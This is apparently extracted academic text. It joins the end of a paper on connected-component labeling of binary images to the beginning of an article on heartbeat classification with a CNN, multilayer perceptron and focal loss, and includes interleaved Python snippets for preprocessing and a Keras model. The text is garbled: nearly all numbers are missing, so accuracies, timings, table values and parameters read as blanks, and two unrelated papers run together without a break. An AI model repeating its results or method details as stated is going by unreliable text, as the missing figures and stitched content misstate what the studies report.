in scan -b, we process the current pixel b(x, y) as follows: ( ) because b(x- , y) is a foreground pixel, we assign b(x- , y)’s label to the current foreground pixel; ( ) because the number of connected parts does not depend on whether b(x- , y- ) and/or b(x- , y+ ) is a background pixel or a foreground pixel, we do not need to check either of them; ( ) according to the number of neighbors of each pixel in the mask, the order for checking the pixels except for b(x- , y- ), b(x- , y+ ), and b(x- , y) is b(x, y- ) b(x, y+ )  b(x+ , y- )  b(x+ , y+ ). if b(x, y- ) is a foreground pixel (e.g., fig. (a)), b(x, y- ) and b(x- , y) belong to the same connected part, we need to do nothing for the pixel. moreover, in this subcase, whether b(x+ , y- ) is a foreground pixel or not does not change the number of connected parts in the mask, we also need to do nothing about this pixel. on the other hand, if b(x, y- ) is a background pixel and b(x+ , y- ) is a foreground pixel (e.g., fig. (b)), we need to resolve the label equivalence of v(x- , y) and v(x+ , y- ). then, b(x, y+ ) and b(x+ , y+ ) can be processed in a similar way. on the other hand, in the case where the current foreground pixel b(x, y) follows a background pixel, there are subcases, as shown in figure . except for b(x- , y), according to the number of neighbors of each pixel in the mask, the order for checking pixels is b(x, y- ) b(x, y+ )  b(x- , y- )  b(x- , y+ )  b(x+ , y- )  b(x+ , y+ ). for each pixel, if there are more than one connected part in the mask (e.g., figure (a)-(d)), we need to resolve the label equivalences among them, and assign to the current foreground pixel its representative label. on the other hand, if there is only one connected part in the mask (e.g., figure (e)), we only need to assign to the current foreground pixel its representative label. lastly, if there is no foreground pixel in the mask (figure (u)), we only need to assign to the current pixel a new provisional label. fig. cases where the current pixel is a foreground pixel following a background pixel in scan -b. as soon as the first scan is finished, all provisional labels assigned to each connected component have been combined in an equivalent label set with a unique representative label. during the second scan, similar to all conventional two-scan labeling algorithms, by replacing each provisional label with its representative label, we can complete labeling. . comparative evaluation we implemented the hcsi algorithm and our algorithm with the c language on a pc-based workstation (intel pentium d . ghz + . ghz cpus, gb memory, mandriva linux os). because our method is a new first-scan method (as we described above, the second scan of our method is exactly the same with the hcsi method), we will compare the performances of the two methods only on the first scan. all data in this section were obtained by averaging of the execution time for , runs with a single core. images used for testing included of four types: noise images, natural images, texture images, and medical images. noise images consist of forty one x -sized noise images were generated by thresholding of the images containing uniform random noise with different threshold values from to in steps of . 
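the noise-image portion of this test set can be reproduced in spirit with a few lines of numpy; the image size, image count, and threshold values below are placeholders, since the exact figures are not preserved in this text.

```python
# Generate binary noise images by thresholding uniform random noise at a range
# of thresholds (higher threshold -> denser foreground). Size, count, and
# threshold range are illustrative placeholders, not the paper's parameters.
import numpy as np

def make_noise_images(size=512, thresholds=np.linspace(0.025, 1.0, 40), seed=0):
    rng = np.random.default_rng(seed)
    images = []
    for t in thresholds:
        noise = rng.uniform(size=(size, size))
        images.append((noise < t).astype(np.uint8))  # foreground density is roughly t
    return images
```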
on the other hand, natural images, including landscape, aerial, fingerprint, portrait, still-life, snapshot, and text images, obtained from the standard image database(sidba)developed by the university of tokyo (http://sampl.ece.ohio-state.edu/data/stills/sidba/index.htm) and the image database of the university of southern california (http://sipi.usc.edu/database/), were used for realistic testing of labeling algorithms. in addition, seven texture images, which were downloaded from the columbia-utrecht reectance and texture database (http:// www .cs. columbia.edu/cave/software/curet/index.php), and medical images obtained from a medical image database of the university of chicago were used for testing. all of these images were × pixels in size, and they were transformed into binary images by a standard thresholding method. fig. shows the speed-up of our method compared to the hcsi method on the × noise images, where the vertical axis is defined as (t -t )/t , where t is the execution time of the hcsi algorithm and t is that of the proposed method. the experimental results on the natural images, the medical images, and the textural images are shown in tab. . tab. comparation on various types of images [ms]. image type hcsi ours natural max. . . mean. . . min. . . medical max. . . mean . . min. . . textural max. . . mean . . min. . . . discussion because our algorithm processes an image piecewise, it is not as efficient as the mectsl algorithm, which does that successively. therefore, our algorithm is not as efficient as the mectsl algorithm for the noise images whose densities are lower than %, where the advantage of our algorithm for resolving connectivity cannot be exerted. for high-density noise images, because our method processes an image every four lines in scan -a, the number of provisional labels assigned by our algorithm is much larger than that assigned by the hcsi algorithm. for example, for the highest density noise image, the number of provisional labels assigned by our algorithm and that assigned by the hcsi algorithm are and , respectively. for each provisional label, we need to apply some operations to establish a new equivalent label set and initialize the representative label table. moreover, because the connectivity of the foreground pixels in this case is simple, the advantage of our method for resolving connectivity cannot be exerted, and the effect of the efficiency of our algorithm becomes weaker and weaker with the increase of the density of an image from %. fig. speed up on the densities of noise images. . conclusions in this paper, we presented a new method for the first scan of label-equivalence based two-scan labeling algorithms. in our proposed method, the first scan consists of two subscans: scan -a and scan -b. in scan -a, we process image lines every four lines. for each current line being scanned, we assign to the foreground pixels in the line and its neighboring lines provisional labels and resolve the label equivalences among them. in scan -b, we scan the lines that were unprocessed in scan -a one by one. for each current line, we assign to the foreground pixels in the line provisional labels and resolve the label equivalences among them and those in its neighboring lines processed in scan -a. by our method, the number of times for checking pixels for assigning provisional labels and processing label equivalences is decreased; thus, the efficiency of labeling is improved. 
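as a side note on the timing methodology above, averaging repeated runs and reporting the relative speed-up (t1 - t2)/t2 can be sketched as follows; the run count and the two labeling functions are stand-ins, not the benchmark actually used.

```python
# Average execution time over repeated runs and report the relative speed-up
# (t1 - t2) / t2 between a baseline and a proposed labeling routine.
import time

def average_runtime(label_func, image, runs=1000):
    start = time.perf_counter()
    for _ in range(runs):
        label_func(image)
    return (time.perf_counter() - start) / runs

def speed_up(baseline_func, proposed_func, image, runs=1000):
    t1 = average_runtime(baseline_func, image, runs)
    t2 = average_runtime(proposed_func, image, runs)
    return (t1 - t2) / t2
```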
our experimental results demonstrated that our method was more efficient than the first scan of conventional label-equivalence-based two-scan labeling algorithms. . acknowledgment this research was partially supported by the ministry of education, science, sports and culture, japan, grant-in- aid for scientific research (c), , . references [ ] c. ronsen and p. a. denjiver. connected components in binary images: the detection problem, research studies press, . [ ] r. c. gonzalez and r. e. woods. digital image processing. addison wesley, . [ ] k. suzuki, i. horiba, and n. sugie. linear-time connected-component labeling based on sequential local operations. computer vision and image understanding, : - , . [ ] a. rosenfeld and j. l. pfalts. sequential operations in digital picture processing. journal of acm, ( ): - , october . [ ] l. he, y. chao, and k. suzuki. a run-based two-scan labeling algorithm. ieee transactions on image processing, ( ): - , [ ] l. he, y. chao, and k. suzuki, k. wu. fast connected-component labeling. pattern recognition, ( ): [ ] l. he, y. chao, and k. suzuki. an efficient first-scan method for label-equivalence-based labeling algorithms. pattern recognition letters, : - , . [ ] l. he, y. chao, and k. suzuki. a run-based one-and-a-half-scan connected-component labeling algorithm. international journal of pattern recognition and artificial intelligence, vol. , no. ( ), pp. - . [ ] l. he, y. chao, and k. suzuki. two efficient label-equivalence-based connected-component labeling algorithms for three-dimensional binary images. ieee transactions on image processing, ( ), , doi:. . /tip. . . [ ] f. chang, c. j. chen, and c. j. lu. a linear-time component-labeling algorithm using contour tracing technique. computer vision and image understanding, : - , . [ ] q. hu, g. qian and w. l. nowinski, fast connected-component labeling in three-dimensional binary images based on iterative recursion. computer vision and image understanding, : - , [ ] a. alexey, k. tomas, w. florentin, and d. babette. real-time image segmentation on a gpu. facing the multicore-challenge, lecture notes in computer science, : - , , springer berlin / heidelberg. [ ] christopher wolfe, t. c. nicholas graham, and joseph a. pape. seeing through the fog: an algorithm for fast and accurate touch detection in optical tabletop surfaces. in acm international conference on interactive tabletops and surfaces (its ' ). acm, - , , new york, ny, usa. a hybrid method for heartbeat classification via convolutional neural networks, multilayer perceptrons and focal loss a hybrid method for heartbeat classification via convolutional neural networks, multilayer perceptrons and focal loss tao wang , changhua lu , mei yang , feng hong and chun liu school of computer and information, hefei university of technology, hefei, anhui, china beijing huaru technology co., ltd. hefei branch, hefei, anhui, china school of electrical engineering and automation, hefei university of technology, hefei, anhui, china abstract background: heart arrhythmia, as one of the most important cardiovascular diseases (cvds), has gained wide attention in the past two decades. the article proposes a hybrid method for heartbeat classification via convolutional neural networks, multilayer perceptrons and focal loss. methods: in the method, a convolution neural network is used to extract the morphological features. 
the reason behind this is that the morphological characteristics of patients have inter-patient variations, which makes it difficult to accurately describe using traditional hand-craft ways. then the extracted morphological features are combined with the rr intervals features and input into the multilayer perceptron for heartbeat classification. the rr intervals features contain the dynamic information of the heartbeat. furthermore, considering that the heartbeat classes are imbalanced and would lead to the poor performance of minority classes, a focal loss is introduced to resolve the problem in the article. results: tested using the mit-bih arrhythmia database, our method achieves an overall positive predictive value of . %, sensitivity of . %, f -score of . %, and accuracy of . %. compared with existing works, our method significantly improves the performance of heartbeat classification. conclusions: our method is simple yet effective, which is potentially used for personal automatic heartbeat classification in remote medical monitoring. the source code is provided on https://github.com/jackandcole/deep-neural- network-for-heartbeat-classification. subjects artificial intelligence, data mining and machine learning, emerging technologies keywords arrhythmia, heartbeat classification, focal loss, convolutional neural network, class imbalance introduction heart arrhythmia, one of the most important cardiovascular disease (cvd), refers to the irregular beating of the patient’s heart. most arrhythmias are asymptomatic and not severe, but some could cause heart disease symptoms such as passing out, lightheadedness, chest pain, shortness of breath, and even stroke and cardiac arrest such as ventricular fibrillation, ventricular escape and atrial fibrillation, which are extremely dangerous and how to cite this article wang t, lu c, yang m, hong f, liu c. . a hybrid method for heartbeat classification via convolutional neural networks, multilayer perceptrons and focal loss. peerj comput. sci. :e doi . /peerj-cs. submitted september accepted november published november corresponding authors tao wang, wtustc@mail.ustc.edu.cn chun liu, dqlch @hfut.edu.cn academic editor robertas damaševičius additional information and declarations can be found on page doi . /peerj-cs. copyright wang et al. distributed under creative commons cc-by . https://github.com/jackandcole/deep-neural-network-for-heartbeat-classification https://github.com/jackandcole/deep-neural-network-for-heartbeat-classification http://dx.doi.org/ . /peerj-cs. mailto:wtustc@�mail.�ustc.�edu.�cn mailto:dqlch @�hfut.�edu.�cn https://peerj.com/academic-boards/editors/ https://peerj.com/academic-boards/editors/ http://dx.doi.org/ . /peerj-cs. http://www.creativecommons.org/licenses/by/ . / http://www.creativecommons.org/licenses/by/ . / https://peerj.com/computer-science/ need immediate treatment. according to statistics from the world health organization, the number of cvd deaths in is close to . million, accounting for about % of the total deaths (shen et al., ). electrocardiogram (ecg), a device that records the electrical activity of the heart, is widely used to diagnose cardiac arrhythmias in clinical (mondéjar-guerra et al., ). an ecg signal consists of a series of periodically repeating heartbeats. each heartbeat usually contains a qrs complex, a t wave, and a p wave, in a few cases there is a u wave (vulaj et al., ). the most significant characteristic of an ecg signal is the qrs complex. 
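the focal loss adopted above to counter class imbalance down-weights well-classified, majority-class examples; a brief numpy sketch of its categorical form follows, with the alpha and gamma values treated as assumed hyperparameters rather than the article's reported settings.

```python
# Categorical focal loss FL(p_t) = -alpha * (1 - p_t)**gamma * log(p_t),
# sketched with numpy for clarity; alpha and gamma are illustrative values.
import numpy as np

def focal_loss(y_true, y_prob, alpha=0.25, gamma=2.0, eps=1e-7):
    """y_true: one-hot labels, shape (n, classes); y_prob: predicted probabilities."""
    y_prob = np.clip(y_prob, eps, 1.0 - eps)
    p_t = np.sum(y_true * y_prob, axis=1)            # probability of the true class
    loss = -alpha * (1.0 - p_t) ** gamma * np.log(p_t)
    return loss.mean()
```

with gamma = 0 and alpha = 1 the expression reduces to the ordinary cross-entropy, which is why easy examples contribute progressively less as gamma grows.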
by analyzing this complex, arrhythmia can be detected. however, the occurrence of arrhythmia is intermittent, especially in the early stages, which makes it difficult to perform effective detection in a short time (mondéjar-guerra et al., ). to solve this problem, a holter monitor is often used to collect long-term heart electrical activity recordings (sannino & de pietro, ). in general, an ecg recording lasts several minutes or even hours. investigating a variety of abnormal arrhythmias beat-by-beat from long-term ecg recordings is very exhausting, even for trained cardiologists. therefore, there is an urgent need for a computer-aided method to automatically detect abnormal heartbeats from long-term ecg data. over the past two decades, a lot of research works (de albuquerque et al., ; de chazal, o’dwyer & reilly, ; mondéjar-guerra et al., ) have been spent on classifying heartbeats automatically. most of these methods are based on morphological characteristics of heartbeats and traditional signal processing techniques. however, the ecg waveform and its morphological characteristics (e.g., the shape of the qrs waves and p wave) of different patients are significantly different, and for the same patient, there are also differences in different circumstances (mondéjar-guerra et al., ), so the fixed features used in these methods are not sufficient to accurately distinguish arrhythmias for all patients. in recent years, some deep neural networks have been proposed, such as convolutional neural networks (cnn), which can automatically extract morphological features and adapt to variations between patients. nevertheless, there is another challenge when processing medical data. due to the limited number of rare classes, the number of one class may greatly exceed that of other classes, that is, the distribution of classes is imbalanced. however, most algorithms try to minimize the overall classification loss during the training process, which implies that these classes are equally important and the same misclassification cost is allocated to all types of errors. as a result, the classifier will tend to correctly classify and favor more frequent classes. the article presents a hybrid method for heartbeat classification via cnn, multilayer perceptrons (mlp) and focal loss. an overall structure of the method is displayed in fig. . the morphological features are extracted by one-dimensional ( d) cnn and combined with the rr intervals features as the input of mlp. the rr intervals features contain the dynamic information of the heartbeat, which could help better capture the pattern of the ecg waveform. furthermore, considering that the heartbeat classes are wang et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ imbalanced and would lead to the poor performance of minority classes, a focal loss is introduced to solve the problem. it shows superior performance in various application environments (howland et al., ; lin et al., ; zhou, waterman-storer & cohan, ). by testing in the well-known mit-bih arrhythmia database (moody & mark, ), our method achieves superior classification performance than existing heartbeat classification methods. note that the accuracy of the ecg classification method has been standardized according to the association for the advancement of medical instrumentation’s (aami) recommendations. the proposed method obtains an overall ppv of . %, se of . %, f of . %, and accuracy of . %. 
the article is organized as follows: “related works” presents the related works of heartbeat classification. the proposed method and loss function are introduced in “methods” and “loss function”. the dataset and the performance of our method against existing works are described in “results”. “discussion” discusses the conclusions. figure a scheme of our proposed method. (a) overview of our method. (b) cnn block of our cnn architecture. (c) an example of mor- phological features extracted by cnn, where the upper part heartbeat signal is the input of cnn, and the lower part is the features extracted by cnn, that is, the morphological features. these features will be flattened and combined with the rr interval features when used as the input of the mlp classifier. full-size doi: . /peerj-cs. /fig- wang et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ related works the existing automatic heartbeat classification works can be divided into two paradigms: intra-patient paradigm and inter-patient paradigm (de chazal, o’dwyer & reilly, ; sannino & de pietro, ). in the intra-patient paradigm, the dataset is based on the heartbeat label split into training and test subsets, so an ecg recording will appear in two subsets (sannino & de pietro, ). according to de chazal, o’dwyer & reilly ( ), the results of this paradigm are biased, resulting in an accuracy of about % in the test phase, because the patient’s characteristics are learned during the training phase (sellami & hwang, ). however, in actual scenarios, the trained model must be able to handle inter-patient variations during the training phase. in the inter-patient paradigm, the training set and test set are from different patients (sannino & de pietro, ), so the differences between patients will be considered during the training process. the classifier will show a better generalization capability. for instance, de chazal, o’dwyer & reilly ( ) propose a linear discriminant heartbeat classification method based on heartbeat morphological and dynamic features. their method achieves a ppv of . %, se of . % in the sveb class, and a ppv of . %, se of . % in the veb class. ye, kumar & coimbra ( ) apply wavelet transform and independent component analysis (ica) to extract morphological features from heartbeats, and combined with dynamic rr interval features develop an support vector machine (svm) method to classify heartbeat. a ppv of . %, se of . % in the sveb class, and a ppv of . %, se of . % in the veb class are obtained by their method. however, the classification accuracies of these methods are significantly lower than the intra-patient paradigm-based methods. this is due to variations of ecg characteristics between patients. recently, with the rapid development in deep learning, deep neural networks-based, especially cnn-based, heartbeat classification methods have received a lot of attention. for example, yıldırım et al. ( ) develop a d-cnn for arrhythmia detection based on long-term ecg signal. their method achieves . % overall accuracy in cardiac arrhythmias. similarly, sellami & hwang ( ) develop a cnn with a batch-weighted loss function for heartbeat classification. hannun et al. ( ) present a deep neural network with residual block to classify rhythm classes. romdhane et al. ( ) based on cnn and focal loss propose an ecg heartbeat classification method. 
although the performance of heartbeat classification is improved, these works mainly focus on using cnn to extract the heartbeat morphological features, while ignoring the influence of rr intervals on heartbeat classification. research shows that by integrating rr interval features, the performance of heartbeat classification can be significantly improved (de chazal, o’dwyer & reilly, ; mondéjar-guerra et al., ; sannino & de pietro, ). romdhane et al. ( ) try to use an improved heartbeat segmentation method to make cnn capture rr interval information, but in their work, cnn can only extract the previous rr interval information at most. this is due to the incomplete division of the right interval. different from existing works, we pre-extract the rr interval wang et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ information in advance, and then combine it with cnn-based morphological features as the input of the classifier. in addition to the above two classification paradigms, a hybrid paradigm has also been studied by some scholars, namely patient-specific paradigm. in the patient-specific paradigm, a global model is first built and then use part of patient data to tune the model to form a local model. de chazal, o’dwyer & reilly ( ) shows that this paradigm is superior to a pure inter-patient model. however, this paradigm requires a professional doctor to label part of the ecg data, and an engineer to fine-tuning the model in clinical. meanwhile, the patient’s ecg signal may change significantly over time, that is, the current ecg signal may undergo large variations at some time in the future, and the use of a previously fine-tuned local classifier may lead to larger misclassification. we focus on the performance of our method in the inter-patient paradigm in the article. methods figure shows the overall structure of the proposed method. the proposed method includes three steps: ecg denoising, feature extraction, and classification. the feature extraction step contains rr intervals features extraction and morphological features extraction via cnn architecture. ecg denoising the ecg signal is usually disturbed by various noises such as electromyography noise, power line interference and baseline wandering (chen et al., ), which makes useful features to be difficultly extracted. in this step, most previous works typically perform a baseline wandering removal and then high-frequency noise filtering (mondéjar- guerra et al., ). however, excessive filtering will lead to the loss of some helpful information in the ecg signal. since cnn has better noise immunity (huang et al., ), we only perform baseline wandering removal and preserve as much information as possible from the raw ecg signal. two median filters are combined to remove the baseline wandering of the ecg signal in the article. first, the qrs complexes and p-waves are removed using a -ms width median filter, and then a -ms width median filter is further adopted to remove t-waves. the output is the baseline wandering of the ecg signal, and the baseline-corrected ecg signal can be achieved by subtracting it from the original signal. an effect of baseline wandering removal is shown in fig. . after obtaining the baseline-corrected ecg signal, the ecg is further segmented into a series of heartbeats based on the labeled r-peaks. 
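the two-step median filtering and the r-peak-centered segmentation described above can be sketched in a few lines of python. this is a minimal sketch, not the authors' code: the filter widths, the sampling rate and the window lengths are placeholders (the source does not preserve the numeric values), and scipy.signal.medfilt is used only as one convenient way to realize the median filters.

```python
import numpy as np
from scipy.signal import medfilt

def remove_baseline_wander(ecg, fs, w1_ms=200, w2_ms=600):
    """estimate baseline wander with two cascaded median filters and subtract it.
    the first filter suppresses qrs complexes and p-waves, the second removes
    t-waves; the widths used here are assumptions, not the paper's values."""
    def to_odd_samples(ms):
        n = int(round(ms * fs / 1000.0))
        return n if n % 2 == 1 else n + 1  # medfilt requires an odd kernel size
    baseline = medfilt(ecg, kernel_size=to_odd_samples(w1_ms))
    baseline = medfilt(baseline, kernel_size=to_odd_samples(w2_ms))
    return ecg - baseline

def segment_heartbeats(ecg, r_peaks, before=140, after=220):
    """cut a fixed-length window around each labeled r-peak
    (the window sizes are placeholders)."""
    beats = [ecg[r - before:r + after] for r in r_peaks
             if r - before >= 0 and r + after <= len(ecg)]
    return np.stack(beats)
```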
specifically, for each heartbeat we obtain sampling points of the ecg signal segment: sampling points before and sampling points after the labeled r-peak. r-peak detection is not the focus of the article, and we directly use the labeled r-peaks in the dataset, as there are many high-precision (> %) r-peak detection methods in the literature (gacek & pedrycz, ; pan & tompkins, ).

figure example of baseline wandering removal. (a) raw ecg signal. (b) raw heartbeat. (c) baseline-corrected ecg signal. (d) baseline-corrected heartbeat. note that after removing the baseline wandering, the heartbeat is shifted to zero.

rr interval features extraction
the time interval between two consecutive r-peaks is normally called the rr interval (ruangsuwana, velikic & bocko, ), and it carries the dynamic information of the heartbeat. to capture this information for heartbeat classification, four features are extracted from the rr intervals, namely the previous rr interval, the post rr interval, the ratio rr and the local rr interval. the previous rr interval is the distance between the current r-peak and the previous one, and the post rr interval is the distance between the current r-peak and the following one. the ratio rr is the ratio of the previous rr interval to the post rr interval. these three features reflect the instantaneous rhythm of a heartbeat. the average of the rr intervals before the current heartbeat is taken as the local rr interval, which represents the overall rhythm in the recent past. because of inter-patient variations in the ecg signal, the rr intervals of different patients cannot be compared directly; in this article we use the patient's entire ecg signal to calculate the average rr interval and subtract it from all rr features (except the ratio rr) to eliminate this effect.
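a small numpy sketch of these four rr features, computed from r-peak sample positions, is given below. the number of preceding intervals averaged for the local rr, the use of seconds as the unit and the skipping of the first and last beats are assumptions made for illustration, since the exact values are not preserved in the source.

```python
import numpy as np

def rr_interval_features(r_peaks, fs, local_window=10):
    """previous rr, post rr, ratio rr and local rr for each heartbeat,
    computed from r-peak sample positions (first and last beats are skipped)."""
    r = np.asarray(r_peaks) / float(fs)   # r-peak times in seconds
    rr = np.diff(r)                       # consecutive rr intervals
    feats = []
    for i in range(1, len(r) - 1):
        prev_rr = rr[i - 1]
        post_rr = rr[i]
        ratio_rr = prev_rr / post_rr
        local_rr = rr[max(0, i - local_window):i].mean()
        feats.append([prev_rr, post_rr, ratio_rr, local_rr])
    feats = np.array(feats)
    # subtract the patient's average rr interval from all features except the ratio
    feats[:, [0, 1, 3]] -= rr.mean()
    return feats
```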
morphological features extraction via cnn architecture
convolutional neural networks are powerful deep neural networks inspired by visual neuroscience (chu, shen & huang, b). they have been used successfully in speech recognition, natural language processing, image classification, and biomedical signal analysis (palaz & collobert, ; pourbabaee, roshtkhari & khorasani, ; yin et al., ). given an image, a cnn can effectively learn high-level abstractions, which can then be fed into a classifier (e.g., a fully connected neural network or an svm) for classification (zhang, zhou & zeng, ). a cnn usually consists of convolutional layers, activation functions, and pooling layers, and sometimes also batch normalization layers.

convolutional layer: this is the most important component of a cnn; it performs a convolution operation on the input data (liu & chen, ). let $f_k$ be the filter and $s$ the d ecg signal. the output of the convolution is calculated as
$c[i] = (s \ast f_k)(i) = \sum_{m} s(m)\, f_k(i - m)$
where the sum runs over the filter of size $m$, and the filter $f_k$ is realized by sharing the weights of adjacent neurons.

activation function: the activation function determines whether a neuron should be activated; its purpose is to let the network express nonlinear decision boundaries. the rectified linear unit (relu) is one of the most widely used activation functions and can be expressed as
$f(x) = \max(0, x)$
where $x$ is the output value of the neuron.

pooling layer: the pooling layer, also known as the down-sampling layer, decreases the computational cost by reducing the output dimension of the convolutional layer, and it can absorb some variations due to signal shift and distortion (zhang, zhou & zeng, ). the most widely used pooling method is max-pooling, which applies the maximum function over the input $s$. let $m$ be the filter size; the output is
$m(x) = \max\{\, s(x + k) : |k| \le m \,\}$

batch normalization layer: the batch normalization layer standardizes the network input, applied either to the activations of a prior layer or to the inputs directly; it can accelerate the training process and provides some regularization, reducing generalization error. let $b = \{x_1, \dots, x_m\}$ be a mini-batch of the training set; the output of batch normalization is
$\hat{x}_i = \dfrac{x_i - \mu_b}{\sqrt{\sigma_b^2 + \epsilon}}$
where $\sigma_b^2$ and $\mu_b$ are the variance and the mean of the mini-batch $b$, respectively, and $\epsilon$ is an arbitrarily small constant that keeps the denominator from being zero.

a cnn is developed and utilized for heartbeat morphological feature extraction in this article. the cnn architecture is displayed in fig. . it contains three convolutional blocks and three pooling layers. each convolutional block includes a convolution layer, a relu activation function and a batch normalization layer. the convolution kernel is reduced as the network becomes deeper; for instance, the first convolution kernel is , while the second is reduced to . batch normalization and relu activation are applied after each convolution operation, and max-pooling is used to reduce the spatial dimension. note that the parameters of the convolutional network are set based on the authors' experience. the detailed parameters of the cnn architecture are listed in table . the output of the last pooling layer is the set of morphological features extracted by the cnn from the heartbeat; an illustration of these features is shown in fig. c.

table the detailed parameters of our proposed deep neural network. the columns give, for each layer, the layer name, kernel size, number of filters, stride, output shape, and the numbers of trainable and non-trainable parameters. the layer sequence is: input a (the raw heartbeat signal), followed by three blocks of [ d convolution, batch normalization, relu, max-pooling], then flatten, input b (the rr interval features), concatenate, dense, and a final dense output layer. notes: a refers to the raw signal of the heartbeat, from which the morphological features are obtained through the cnn architecture; b refers to the rr interval features of the heartbeat, which are combined with the cnn-based morphological features to build the final classification model.

mlp classifier
the cnn-based morphological features and the rr interval features are combined as the input of the classifier. in general, any classifier (e.g., an svm or a random forest (rf)) can be used for heartbeat classification. here, we adopt a multilayer perceptron (mlp, also known as a fully connected neural network in deep learning) as the classifier. the reason is that the cnn and the mlp can be trained jointly (we call this one-step training); compared with other methods, this usually achieves better performance. specifically, our mlp classifier contains an input layer, a hidden layer and an output layer. the input layer consists of two parts: the cnn-based morphological features and the rr interval features. the hidden layer has neurons, each connected to all input features. the output layer has neurons, each representing a kind of arrhythmia or a normal heartbeat. the details of our method are shown in fig. and table .
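a keras sketch of the two-input architecture just described is shown below. this is an illustration under stated assumptions rather than the authors' implementation: the signal length, kernel sizes, filter counts, hidden-layer width and number of output classes are placeholders (the numeric values are not preserved in the source), and the ordering of batch normalization and relu inside each block is likewise an assumption.

```python
from tensorflow.keras import layers, Model

def build_model(beat_len=360, n_rr_features=4, n_classes=4):
    # input a: the raw (baseline-corrected) heartbeat segment
    beat_in = layers.Input(shape=(beat_len, 1), name="heartbeat")
    x = beat_in
    for filters, kernel in [(32, 7), (64, 5), (128, 3)]:   # placeholder values
        x = layers.Conv1D(filters, kernel, padding="same")(x)
        x = layers.BatchNormalization()(x)
        x = layers.Activation("relu")(x)
        x = layers.MaxPooling1D(pool_size=2)(x)
    morph = layers.Flatten()(x)                 # cnn-based morphological features

    # input b: the pre-extracted rr interval features
    rr_in = layers.Input(shape=(n_rr_features,), name="rr_features")

    # mlp classifier over the concatenated features (trained jointly with the cnn)
    h = layers.Concatenate()([morph, rr_in])
    h = layers.Dense(64, activation="relu")(h)  # hidden-layer width is a placeholder
    out = layers.Dense(n_classes, activation="softmax")(h)
    return Model(inputs=[beat_in, rr_in], outputs=out)

model = build_model()
```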
loss function
before training a deep neural network, a loss function must first be chosen. the cross-entropy loss is the most widely used loss in deep neural network classification (chu, wang & lu, a). however, this loss function does not address the class imbalance problem, so a focal loss function is introduced in the article to deal with it.

cross-entropy loss
the cross-entropy is a measure from information theory (robinson, cattaneo & el-said, ). it is based on entropy and calculates the difference between two probability distributions. it is closely related to the kl divergence, which computes the relative entropy between two probability distributions, whereas the cross-entropy calculates the total entropy between the distributions. the cross-entropy is usually taken as the loss function in deep neural network classification (chu, wang & lu, a). let $t_i$ and $p_i$ be the ground truth and the estimated probability of each category; the cross-entropy loss is computed as
$ce = -\sum_{i \in c} t_i \log(p_i)$
where $c$ refers to the category set of the heartbeat. in the cross-entropy loss, each category is treated equally, which lets the majority category overwhelm the loss, so that in an imbalanced setting the model tends to predict the majority category.

focal loss
a characteristic of the cross-entropy loss is that even easy-to-classify examples cause significant losses, so the easy examples that constitute most of the dataset can dominate training and negatively affect the rare classes (lin et al., ). the focal loss is designed to deal with this imbalance by reshaping the cross-entropy loss so that it pays less attention to easy examples and focuses on difficult ones. a general formula for the focal loss is
$fl = -\sum_{i \in c} t_i\, (1 - p_i)^{\gamma} \log(p_i)$
where $\gamma$ acts as the modulating factor. as shown in fig. , the higher the $\gamma$ value, the smaller the cost incurred by well-classified examples. in practice, the α-balanced variant of the focal loss is usually used when one or more categories are highly imbalanced; it is defined as
$fl = -\sum_{i \in c} t_i\, \alpha_i\, (1 - p_i)^{\gamma} \log(p_i)$
where $\alpha_i$ is the weighting factor of each category.

results
data set
the ecg dataset from the mit-bih arrhythmia database (moody & mark, ) is used to test our proposed method. this dataset contains -min ambulatory two-lead ecg recordings collected from subjects. each ecg signal is sampled at hz with
the first lead is the modified-lead ii (ml ii), and the second lead depends on the record, one of v , v , v or v . the heartbeat of these ecg signals is independently labeled by two or more doctors, and there are about , heartbeats. according to the recommendation of aami, these heartbeats are further divided into five heartbeat classes. table shows the mapping of aami classes and mit-bih arrhythmia heartbeat types. since q is practically non-existent, we ignore it like others (mar et al., ; zhang et al., ). meanwhile, four recordings with paced beats are figure the relationship between the modulating factor γ and the cost of the well-classified examples (lin et al., ). full-size doi: . /peerj-cs. /fig- table mapping of aami classes and mit-bih arrhythmia heartbeat types. aami classes mit-bih types mit-bih annotate normal (n) normal beat (nor) n nodal (junctional) escape beat (ne) j atrial escape beat (ae) e right bundle branch block beat (rbbb) r left bundle branch block beat (lbbb) l supraventricular ectopic beat (sveb) aberrated arial premature beat (aap) a premature or ectopic supraventricular beat (sp) s nodal (junctional) premature beat (np) j atrial premature beat (ap) a ventricular ectopic beat (veb) ventricular escape beat (ve) e premature ventricular contraction (pvc) v fusion beat (f) fusion of ventricular and normal beat (fvn) f unknown beat (q) unclassifiable beat (u) q fusion of paced and normal beat (fpn) f paced beat (p) / wang et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ removed in consistent with the aami recommended practice, namely , , and . since all records have ml ii ecg signals and they are widely used in wireless body sensor network (wbsn) based ecg applications, this lead ecg signal is used for heartbeat classification in the article. as we mentioned in related works, the article focuses on the heartbeat classification under the inter-patient paradigm. to facilitate comparison with existing works, we follow de chazal, o’dwyer & reilly ( ) to split the dataset into two subsets. each contains regular and complex arrhythmia records and has roughly the same number of heartbeat types. table shows the details of two subsets. the first (ds ) is used for training whereas the second (ds ) is used to test the heartbeat classification performance (de chazal, o’dwyer & reilly, ). no patient appears in both subsets at the same time. model training and performance metrics in the study, the general focal loss (non-α-balanced focal loss) is used as the loss function, and the modulating factor g is set to the default value (g = ). since adam can accelerate the model training, we use it as the optimizer. the batch size of the model is set to and the maximum epoch is . the initial learning rate is . , and reduced by . times every epochs. in addition, in order to avoid overfitting, the l penalty is set to e− based on trial and error. the model is implemented using keras and trained on the nvidia geforce rtx ti graphical processing unit. 
table detailed breakdown of the dataset: the number of samples per aami class (n, sveb, veb, f) and the total, for ds , ds , and ds + ds .

to evaluate the performance of our proposed method, three widely used metrics are adopted, namely the positive predictive value (ppv), the sensitivity (se), and the accuracy (acc), defined as
